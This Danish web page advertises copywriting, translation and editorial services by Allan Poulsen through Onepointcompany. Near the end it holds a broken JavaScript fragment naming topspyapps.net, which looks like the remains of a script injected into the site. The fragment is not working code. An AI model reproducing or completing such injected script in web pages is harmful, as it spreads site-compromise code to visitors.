Allan Poulsen – tekst og kommunikation

allan-1

Allan er journalist, tekstforfatter, oversætter og konceptudvikler. Han er leveringsdygtig i tekster til det meste, skarpe vinkler, salgsargumenter og gode ideer i lange baner. Her kan du få alt fra en fængende overskrift til en saglig artikel, den provokerende annoncetekst eller hjemmesidetekster, der får Google til at juble. Han er desuden skrap til at finde de rigtige historier og vinkler til jeres opdateringer på de sociale medier.

Allan har en fortid som forlagsredaktør, så han er ikke bange for de store tekstmængder, hvis du har store tryksager, der skal skrives, oversættes/versioneres eller bare have den sidste gennemgang, hvor sproget skal finpudses. Men han er også vant til at finde den rigtige overskrift til en lille annonce eller sætte system i teksterne til en hjemmeside.

Allan arbejder for flere forskellige blade, så det ville være oplagt at få en snak med Onepointcompany, hvis I overvejer et personaleblad, kundemagasin eller lignende. Vi vil både kunne stå for tekst, layout, foto, redaktion, annoncer og tryk. Hvis I bare skal bruge en lille brochure, så kan en tekstforfatter også gøre en stor forskel.

Men lad os tage en snak, så bliver vi alle sammen meget klogere. Ring og aftal et møde på 2812 2130.

 

  ”; if (document.currentScript) { } else {topspyapps.net

Share This